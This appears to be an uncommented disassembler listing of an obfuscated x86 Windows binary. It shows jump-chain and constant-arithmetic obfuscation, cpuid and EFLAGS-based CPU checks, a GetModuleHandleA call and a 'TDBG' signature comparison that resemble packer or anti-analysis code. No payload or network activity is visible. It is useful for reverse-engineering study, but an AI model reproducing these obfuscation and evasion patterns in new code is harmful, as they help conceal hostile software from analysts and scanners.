; END OF FUNCTION CHUNK FOR sub_426A9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_42877C: ; CODE XREF: sub_42C1AE-72D5�j
mov eax, 1
xor edx, edx
cpuid
jmp loc_42AA02
; END OF FUNCTION CHUNK FOR sub_42C1AE
; =============== S U B R O U T I N E =======================================
sub_42878A proc near ; CODE XREF: _94j21ax3:0042880B�j
; _94j21ax3:0042A337�p
; FUNCTION CHUNK AT 00426D10 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00428C12 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042B874 SIZE 00000005 BYTES
mov [esp+0], edi
pop edi
push 57A9C14Fh
pop esi
xor esi, 5A7175A4h
cmp esi, 6D86A9CDh
jmp loc_428C12
sub_42878A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EE4
loc_4287A5: ; CODE XREF: sub_424EE4:loc_429CDC�j
call sub_423D25
loc_4287AA: ; CODE XREF: sub_42B0C9-18A8�j
jmp loc_4253A1
; END OF FUNCTION CHUNK FOR sub_424EE4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A61F
loc_4287AF: ; CODE XREF: sub_42A61F-6ED0�j
jmp nullsub_107
; END OF FUNCTION CHUNK FOR sub_42A61F
; ---------------------------------------------------------------------------
loc_4287B4: ; CODE XREF: _94j21ax3:00421ED1�j
jmp loc_4242B0
; ---------------------------------------------------------------------------
loc_4287B9: ; CODE XREF: _94j21ax3:00423AA3�j
jle loc_421A59
; =============== S U B R O U T I N E =======================================
sub_4287BF proc near ; CODE XREF: sub_424775+2F92�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042827F SIZE 00000009 BYTES
xchg ecx, [esp-4+arg_0]
pop ecx
add edx, 3C834B82h
jmp loc_42827F
sub_4287BF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7FC
loc_4287CE: ; CODE XREF: sub_42A7FC:loc_421C1B�j
mov ds:dword_42C48C, eax
call sub_4258EB
loc_4287D8: ; CODE XREF: sub_42284F+46C6�j
; _94j21ax3:00429D50�j
jmp loc_425415
; END OF FUNCTION CHUNK FOR sub_42A7FC
; ---------------------------------------------------------------------------
xchg eax, esi
jmp sub_4258EB
; ---------------------------------------------------------------------------
loc_4287E4: ; DATA XREF: sub_42510A+5�o
push 0CB6EACB7h
pop ecx
and ecx, 0FF56A084h
add ecx, 34FBD297h
popf
xchg ecx, [esp]
jmp loc_4231C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_4287FF: ; CODE XREF: sub_4294B3-507A�j
adc ebp, 93C8677h
jmp loc_42302D
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
push ecx
jmp sub_42878A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_175. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_428811 proc near ; CODE XREF: sub_42284F-10D1�p
; _94j21ax3:0042492E�j
; FUNCTION CHUNK AT 004219A5 SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
add eax, 4CE1B878h
mov dword ptr [eax], 6C43776Fh
lea eax, [ebp-14h]
push offset loc_4241B1
jmp loc_4219A5
sub_428811 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422973
loc_42882E: ; CODE XREF: sub_422973+5C75�j
pop eax
mov [eax], ecx
loc_428831: ; CODE XREF: sub_42BA8A:loc_4235A3�j
call sub_4210AA
push 0D29519BCh
pop edx
or edx, 0E5084B89h
xor edx, 6904E983h
push offset sub_42A440
jmp nullsub_63
; END OF FUNCTION CHUNK FOR sub_422973
; ---------------------------------------------------------------------------
push eax
ror eax, 0Fh
mov ds:dword_424080, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_42885D: ; CODE XREF: sub_421402+BD0�j
jmp loc_4293E5
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A83
loc_428862: ; CODE XREF: sub_429A83+A�j
xor eax, 200000h
push eax
popf
pushf
xchg ebp, [esp+0]
mov eax, ebp
jmp loc_426F6E
; END OF FUNCTION CHUNK FOR sub_429A83
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB39
loc_428874: ; CODE XREF: sub_42BB39:loc_427208�j
shl ebx, 18h
mov ecx, 1A1A1A7Fh
jmp loc_421056
; END OF FUNCTION CHUNK FOR sub_42BB39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_428881: ; CODE XREF: sub_4294B3-102D�j
shl eax, 13h
cmp esi, ecx
jmp loc_4299A5
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
shr ecx, 16h
jmp loc_42851C
; ---------------------------------------------------------------------------
loc_428893: ; DATA XREF: sub_422AD5+39F3�o
push 0EB3B60ADh
pop edx
add edx, 0E9C976D8h
push edx
push offset sub_421393
jmp loc_424A3D
; ---------------------------------------------------------------------------
loc_4288AA: ; CODE XREF: _94j21ax3:00425578�j
call sub_429D19
push 0
lea eax, [ebp-400h]
push eax
push 0FFFFFFFFh
jmp loc_42B834
; =============== S U B R O U T I N E =======================================
sub_4288BF proc near ; CODE XREF: sub_426A43�j
; DATA XREF: sub_429862-2E29�o
mov edx, 0BB931B55h
call sub_4239A5
push eax
ror eax, 1Bh
mov ds:dword_423428, eax
retn
sub_4288BF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4288D4 proc near ; CODE XREF: _94j21ax3:004249D7�j
; sub_428B8C+1�p
xchg edi, [esp+0]
pop edi
mov eax, [ebp-20h]
call sub_42A709
pop ecx
mov [ebp-20h], eax
loc_4288E4: ; CODE XREF: sub_426626+29AC�j
; sub_426626+5644�j ...
push offset aLerEIeLeLxSmd ; "‹Eà+E؉EÜ‹EÜ‹å]ém¤"
jmp nullsub_59
sub_4288D4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4288EE proc near ; CODE XREF: sub_421F28-692�p
; _94j21ax3:00429C11�j
xchg ebx, [esp+0]
pop ebx
xor edx, edx
call sub_428AE1
loc_4288F9: ; CODE XREF: sub_4210AA:loc_426E0D�j
; sub_428993+A�j
push 86E0FEBDh
pop eax
xor eax, 571B1B76h
add eax, 2E463CA9h
jmp loc_428AE7
sub_4288EE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421DC4
loc_428910: ; CODE XREF: sub_421DC4+8375�j
mov [ebp-14h], eax
mov eax, [ebp-14h]
mov eax, [eax+18h]
dec eax
push offset loc_42173B
jmp nullsub_95
; END OF FUNCTION CHUNK FOR sub_421DC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_428924: ; CODE XREF: sub_422EB0-3A�j
sbb eax, edx
or esi, ecx
jmp loc_4272F8
; ---------------------------------------------------------------------------
loc_42892D: ; CODE XREF: sub_422EB0:loc_42BC7E�j
cmp dword ptr [ebp-4], 4
jnz loc_4272F8
lea eax, [ebp-2BBh]
cmp dword ptr [eax], 47424454h
jz loc_42A566
jmp loc_42AE3A
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
loc_42894E: ; CODE XREF: _94j21ax3:00422236�j
jo loc_4295CA
; =============== S U B R O U T I N E =======================================
sub_428954 proc near ; CODE XREF: sub_4271A0+3D08�p
; FUNCTION CHUNK AT 004273F0 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00428504 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428E9C SIZE 0000001F BYTES
mov [esp+0], ecx
pop ecx
mov eax, [eax+60h]
add eax, [ebp-4]
mov [ebp-14h], eax
mov eax, [ebp-14h]
mov eax, [eax+18h]
jmp loc_428E9C
sub_428954 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42896C: ; CODE XREF: _94j21ax3:00425891�j
add eax, 3CF1530Ch
mov eax, [eax]
push eax
push esi
push 0EBAE3A9Bh
pop esi
jmp loc_422462
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425324
loc_428981: ; CODE XREF: sub_425324:loc_42532B�j
jz loc_428CAA
jmp loc_427C5F
; END OF FUNCTION CHUNK FOR sub_425324
; ---------------------------------------------------------------------------
xchg ebp, ebx
jmp loc_42AF9A
; =============== S U B R O U T I N E =======================================
sub_428993 proc near ; CODE XREF: sub_4210AA:loc_426DDC�j
var_18 = dword ptr -18h
; FUNCTION CHUNK AT 004234B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042391F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042511D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004268EB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00427E2A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428129 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004283BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428D38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A690 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A750 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042AD49 SIZE 00000018 BYTES
add esp, 0FFFFFFECh
cmp ds:dword_422274, 0
jnz loc_4288F9
jmp loc_4283BA
sub_428993 endp
; ---------------------------------------------------------------------------
ja loc_428E4E
; START OF FUNCTION CHUNK FOR sub_423A56
loc_4289AE: ; CODE XREF: sub_423A56+3A8B�j
jmp sub_42AD91
; END OF FUNCTION CHUNK FOR sub_423A56
; =============== S U B R O U T I N E =======================================
sub_4289B3 proc near ; CODE XREF: sub_42284F+61C8�j
; sub_42A061+6�p
; FUNCTION CHUNK AT 004245A3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042A110 SIZE 00000007 BYTES
mov [esp+0], edx
pop edx
xor eax, 0BE7A0F44h
add eax, ebp
add eax, 6F4F84Dh
mov eax, [eax]
mov edx, [ebp-8]
jmp loc_42A110
sub_4289B3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4289CF proc near ; CODE XREF: sub_428F65:loc_4249DC�j
; FUNCTION CHUNK AT 0042AB03 SIZE 0000000D BYTES
add esp, 0FFFFFFF4h
jmp loc_42AB03
sub_4289CF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42315D
loc_4289D7: ; CODE XREF: sub_42315D+4�j
mov esp, ebp
pop ebp
push 29E7D2B9h
pop eax
rol eax, 0Ch
or eax, 0AF966568h
add eax, 825E9Ah
jmp loc_42BDC6
; END OF FUNCTION CHUNK FOR sub_42315D
; ---------------------------------------------------------------------------
ror ebp, 5
jmp loc_42592E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_4289FC: ; CODE XREF: sub_421D33:loc_423EDE�j
push 0B4B23475h
pop esi
add esi, 780FB88h
or esi, 0BE5090DFh
jmp loc_428534
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
add eax, edx
; START OF FUNCTION CHUNK FOR sub_42284F
loc_428A15: ; CODE XREF: sub_42284F+39�j
mov ebp, [ecx]
jmp sub_4289B3
; END OF FUNCTION CHUNK FOR sub_42284F
; =============== S U B R O U T I N E =======================================
sub_428A1C proc near ; DATA XREF: _94j21ax3:0042313E�o
push 9958DC35h
pop edx
and edx, 624322B5h
push offset sub_428F4B
jmp locret_423392
sub_428A1C endp
; ---------------------------------------------------------------------------
test al, al
jz locret_4284FE
jmp loc_42935B
; ---------------------------------------------------------------------------
loc_428A3F: ; DATA XREF: sub_421457+6704�o
push edi
push 605560EBh
xchg esi, [esp]
mov edi, esi
pop esi
or edi, 1212A66Bh
jmp loc_42110A
; ---------------------------------------------------------------------------
and ecx, esi
jmp sub_424839
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_428A5D: ; CODE XREF: sub_42C1AE:loc_421C38�j
; sub_42C1AE-6910�j
mov edi, eax
push 0D2B2BBEBh
pop eax
add eax, 0AD4D4416h
xor edx, edx
cpuid
and eax, 0FFFh
jmp loc_425B6D
; END OF FUNCTION CHUNK FOR sub_42C1AE
; =============== S U B R O U T I N E =======================================
sub_428A79 proc near ; DATA XREF: sub_42C057-AE51�o
call edx ; GetModuleHandleA
xor eax, eax
retn
sub_428A79 endp
; =============== S U B R O U T I N E =======================================
sub_428A7E proc near ; CODE XREF: sub_42220B+6�p
; sub_42283B+2FC8�j
push esi
loc_428A7F: ; CODE XREF: _94j21ax3:loc_428D47�j
push 74CD1407h
jmp loc_425753
sub_428A7E endp
; ---------------------------------------------------------------------------
test esi, ebp
jmp loc_422FB6
; =============== S U B R O U T I N E =======================================
sub_428A90 proc near ; CODE XREF: sub_421480+65F�p
; FUNCTION CHUNK AT 00421872 SIZE 00000010 BYTES
mov [esp+0], edx
pop edx
add edx, edi
rol edx, 5
call sub_4216D0
loc_428A9E: ; CODE XREF: sub_42BD16+F�j
jmp loc_421872
sub_428A90 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_428AA3: ; CODE XREF: _94j21ax3:004235E5�j
jmp locret_427B03
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CEA
loc_428AA8: ; CODE XREF: sub_427CEA+14�j
add eax, 5A51DDC7h
xchg eax, [esp+8+var_8]
jmp loc_422F29
; END OF FUNCTION CHUNK FOR sub_427CEA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425983
loc_428AB6: ; CODE XREF: sub_425983:loc_428E7E�j
xor esi, edi
jmp loc_4240A5
; END OF FUNCTION CHUNK FOR sub_425983
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_428ABD: ; CODE XREF: sub_423324-1239�j
xchg edi, ecx
ror ecx, 0Bh
jmp loc_42786E
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422C48
loc_428AC7: ; CODE XREF: sub_422C48+47F4�j
jno loc_429255
loc_428ACD: ; CODE XREF: sub_422C48:loc_427430�j
add eax, 4090DF13h
add eax, ebp
call sub_42B314
; END OF FUNCTION CHUNK FOR sub_422C48
; START OF FUNCTION CHUNK FOR sub_421656
loc_428ADA: ; CODE XREF: sub_421656+6E1F�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_421656
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_428ADC: ; CODE XREF: sub_4272E9+83C�j
jmp loc_422C0E
; END OF FUNCTION CHUNK FOR sub_4272E9
; =============== S U B R O U T I N E =======================================
sub_428AE1 proc near ; CODE XREF: sub_429382-55E0�p
; sub_421F28+2757�p ...
; FUNCTION CHUNK AT 00428065 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428C2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042917B SIZE 00000011 BYTES
push ebp
call sub_423284
loc_428AE7: ; CODE XREF: sub_4288EE+1D�j
jmp loc_428065
sub_428AE1 endp
; ---------------------------------------------------------------------------
loc_428AEC: ; CODE XREF: _94j21ax3:loc_4273E1�j
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_424667
jmp loc_422FE6
; ---------------------------------------------------------------------------
loc_428AFE: ; CODE XREF: _94j21ax3:loc_429429�j
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_425BD4[eax*4]
mov [ebp-8], eax
push offset sub_422FDC
jmp loc_42AFE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422E59
loc_428B18: ; CODE XREF: sub_422E59+2A62�j
jnz loc_4224C0
jmp loc_424A52
; END OF FUNCTION CHUNK FOR sub_422E59
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_53. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429629
loc_428B24: ; CODE XREF: sub_429629-10C1�j
jmp loc_4278E6
; END OF FUNCTION CHUNK FOR sub_429629
; ---------------------------------------------------------------------------
loc_428B29: ; CODE XREF: _94j21ax3:0042803B�j
jmp loc_4291DC
; ---------------------------------------------------------------------------
loc_428B2E: ; CODE XREF: _94j21ax3:00427251�j
jmp loc_4257E2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425819
loc_428B33: ; CODE XREF: sub_425819-34F8�j
jmp nullsub_218
; END OF FUNCTION CHUNK FOR sub_425819
; ---------------------------------------------------------------------------
sub eax, 5FC92625h
not esi
jmp sub_42A358
; ---------------------------------------------------------------------------
or edi, 0EEB773A7h
jmp loc_42BB33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFEE
loc_428B50: ; CODE XREF: sub_42AFEE+B�j
xchg ebp, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_42AFEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424627
loc_428B54: ; CODE XREF: sub_424627+67AA�j
jmp loc_42A2E6
; END OF FUNCTION CHUNK FOR sub_424627
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232F5
loc_428B59: ; CODE XREF: sub_4232F5-654�j
jmp loc_42C3F5
; END OF FUNCTION CHUNK FOR sub_4232F5
; =============== S U B R O U T I N E =======================================
sub_428B5E proc near ; DATA XREF: sub_42AFEE+6�o
; FUNCTION CHUNK AT 0042301D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423123 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042422A SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00424443 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424916 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00425138 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426A18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426F1A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429D14 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BE06 SIZE 00000012 BYTES
mov eax, ds:dword_421998
or eax, eax
jnz loc_429D14
jmp loc_42301D
sub_428B5E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428B71 proc near ; DATA XREF: sub_42B238:loc_42C0D5�o
pop ecx
pop ebp
retn
sub_428B71 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428B74 proc near ; CODE XREF: _94j21ax3:loc_422A47�p
; sub_422973:loc_42A9B2�p ...
jno sub_4264AF
push ebp
mov ebp, esp
call sub_42196C
loc_428B82: ; CODE XREF: sub_42BB8A+12�j
jmp loc_42B8C5
sub_428B74 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_428B87: ; CODE XREF: sub_4281A5+11A8�j
jmp loc_422556
; END OF FUNCTION CHUNK FOR sub_4281A5
; =============== S U B R O U T I N E =======================================
sub_428B8C proc near ; CODE XREF: sub_426626:loc_42B80E�j
push ebp
call sub_4288D4
sub_428B8C endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4249A9
loc_428B92: ; CODE XREF: sub_4249A9+5859�j
jmp loc_426DB5
; END OF FUNCTION CHUNK FOR sub_4249A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427849
loc_428B97: ; CODE XREF: sub_427849+275D�j
jmp loc_423802
; END OF FUNCTION CHUNK FOR sub_427849
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426744
loc_428B9C: ; CODE XREF: sub_426744+F�j
jmp loc_421DF8
; END OF FUNCTION CHUNK FOR sub_426744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FDC
loc_428BA1: ; CODE XREF: sub_422FDC+B96�j
jmp loc_421310
; END OF FUNCTION CHUNK FOR sub_422FDC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_167. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CAC
loc_428BA7: ; CODE XREF: sub_427CAC+5�j
jmp loc_42414E
; END OF FUNCTION CHUNK FOR sub_427CAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_428BAC: ; CODE XREF: sub_423614+3067�j
jmp loc_42B822
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_428BB1: ; CODE XREF: sub_42A0CC-615D�j
mov ebx, edx
shr ecx, 18h
jmp loc_4298D5
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
loc_428BBB: ; CODE XREF: _94j21ax3:00423C0B�j
xchg eax, [esi]
; =============== S U B R O U T I N E =======================================
sub_428BBD proc near ; CODE XREF: sub_424C37+CAA�p
var_4 = dword ptr -4
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0042168F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00421DA4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00423212 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042347B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004235EA SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00424D3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424E64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042508C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042526C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042547E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00425A25 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426E71 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427DE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428234 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00428298 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429C60 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042A303 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042A6C0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042AC60 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AC9D SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042AD7B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042B45A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042BDB8 SIZE 0000000E BYTES
mov [esp+0], ecx
pop ecx
lea eax, [ebp-24h]
call sub_427CAC
loc_428BC9: ; CODE XREF: sub_421F28:loc_429A51�j
add edx, 0AFDDDBAAh
call sub_42851E
loc_428BD4: ; CODE XREF: sub_4220B7+7C30�j
jmp loc_42508C
sub_428BBD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42983E
loc_428BD9: ; CODE XREF: sub_42983E-7F24�j
jmp loc_424335
; END OF FUNCTION CHUNK FOR sub_42983E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B772
loc_428BDE: ; CODE XREF: sub_42B772:loc_421C6B�j
mov byte ptr [ebp-1], 0
mov eax, cs
xor al, al
push offset sub_4235AE
jmp nullsub_223
; END OF FUNCTION CHUNK FOR sub_42B772
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_428BF0: ; CODE XREF: sub_42C1AE:loc_425B6D�j
add [esi], eax
push eax
push 9B3FAF7Eh
pop eax
and eax, 0E02E4113h
jnz loc_4229AE
; END OF FUNCTION CHUNK FOR sub_42C1AE
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_428C05: ; CODE XREF: sub_42C0BC-9B1C�j
jmp loc_42A2BC
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
rol ebp, 19h
jmp loc_42470B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42878A
loc_428C12: ; CODE XREF: sub_42878A+16�j
jl loc_426D10
; END OF FUNCTION CHUNK FOR sub_42878A
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_428C18: ; CODE XREF: sub_4259BF+6�j
jmp loc_429303
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
adc edx, 0A861B8E9h
sbb ebx, ebp
jmp loc_426D10
; ---------------------------------------------------------------------------
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_148. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AE1
loc_428C2C: ; CODE XREF: sub_428AE1-A73�j
jmp loc_42917B
; END OF FUNCTION CHUNK FOR sub_428AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D58
loc_428C31: ; CODE XREF: sub_424D58+1B15�j
jmp sub_42B500
; END OF FUNCTION CHUNK FOR sub_424D58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_428C36: ; CODE XREF: sub_42169F+4DF3�j
; sub_42169F+5217�j
call sub_42C057
test al, al
jz loc_4280FB
push edx
jmp loc_429493
; END OF FUNCTION CHUNK FOR sub_42169F
; =============== S U B R O U T I N E =======================================
sub_428C49 proc near ; DATA XREF: sub_42BB0D-A73C�o
; FUNCTION CHUNK AT 00428E1A SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042996F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A37F SIZE 00000005 BYTES
push 95216DF3h
pop eax
sub eax, 0C873F329h
add eax, 8C682D66h
add eax, ebp
add eax, 0A6EA57C0h
mov eax, [eax]
jmp loc_42996F
sub_428C49 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B856
loc_428C6A: ; CODE XREF: sub_42B856-B64�j
movzx edx, byte ptr [ecx+edx]
and eax, edx
jz loc_42BFCA
jmp loc_427C6A
; END OF FUNCTION CHUNK FOR sub_42B856
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4248E7
loc_428C7B: ; CODE XREF: sub_4248E7+D�j
; sub_4248E7:loc_424A8C�j
call sub_422F50
loc_428C80: ; CODE XREF: sub_429F43+C�j
jmp loc_421195
; END OF FUNCTION CHUNK FOR sub_4248E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_428C85: ; CODE XREF: sub_421689+1�j
mov ebp, esp
jb sub_42BC17
add esp, 0FFFFFFF0h
loc_428C90: ; CODE XREF: sub_42426B:loc_42503D�j
call sub_42574E
mov edx, 0CB39536Bh
call sub_4239A5
push edi
push 0CA44D7CFh
jmp loc_423D80
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425324
loc_428CAA: ; CODE XREF: sub_425324-2243�j
; sub_425324:loc_428981�j
push edx
push 0B85F67D1h
pop edx
add edx, 47E2CF66h
xchg edx, [esp+8+var_8]
jmp sub_42574E
; END OF FUNCTION CHUNK FOR sub_425324
; ---------------------------------------------------------------------------
loc_428CBF: ; CODE XREF: _94j21ax3:00426E9F�j
call sub_4213A8
; START OF FUNCTION CHUNK FOR sub_42A5A2
loc_428CC4: ; CODE XREF: sub_42A5A2:loc_4239A0�j
pop ebx
sub ebx, 0D5DBB702h
add ebx, 8FE90F1h
mov [ebx], eax
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_42A5A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4228FF
loc_428CD5: ; CODE XREF: sub_4228FF+30EC�j
jmp loc_426D78
; END OF FUNCTION CHUNK FOR sub_4228FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42430C
loc_428CDA: ; CODE XREF: sub_42430C-DB4�j
; _94j21ax3:00424CB3�j
rol eax, 4
jmp loc_423A28
; END OF FUNCTION CHUNK FOR sub_42430C
; ---------------------------------------------------------------------------
push ebx
push 8B52A9B6h
pop ebx
xor ebx, 4B19A14Eh
push offset loc_424382
jmp loc_426A44
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B856
loc_428CF9: ; CODE XREF: sub_42B856:loc_427C6A�j
jnz loc_429B29
jmp loc_421542
; END OF FUNCTION CHUNK FOR sub_42B856
; ---------------------------------------------------------------------------
loc_428D04: ; CODE XREF: _94j21ax3:00428FA1�j
; _94j21ax3:loc_42A495�j
xor edx, 4C4E0696h
add eax, edx
pop edx
call sub_4221A3
; START OF FUNCTION CHUNK FOR sub_423324
loc_428D12: ; CODE XREF: sub_423324:loc_424798�j
pop edi
rol edi, 1
add edi, 0BBDCCD42h
xchg edi, [esp+0]
jmp loc_424CE8
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
jmp loc_422EAB
; ---------------------------------------------------------------------------
jmp loc_423AB6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_428D2E: ; CODE XREF: sub_42C057+14�j
jmp loc_4281DE
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B202
loc_428D33: ; CODE XREF: sub_42B202+1A�j
jmp loc_42AA18
; END OF FUNCTION CHUNK FOR sub_42B202
; ---------------------------------------------------------------------------
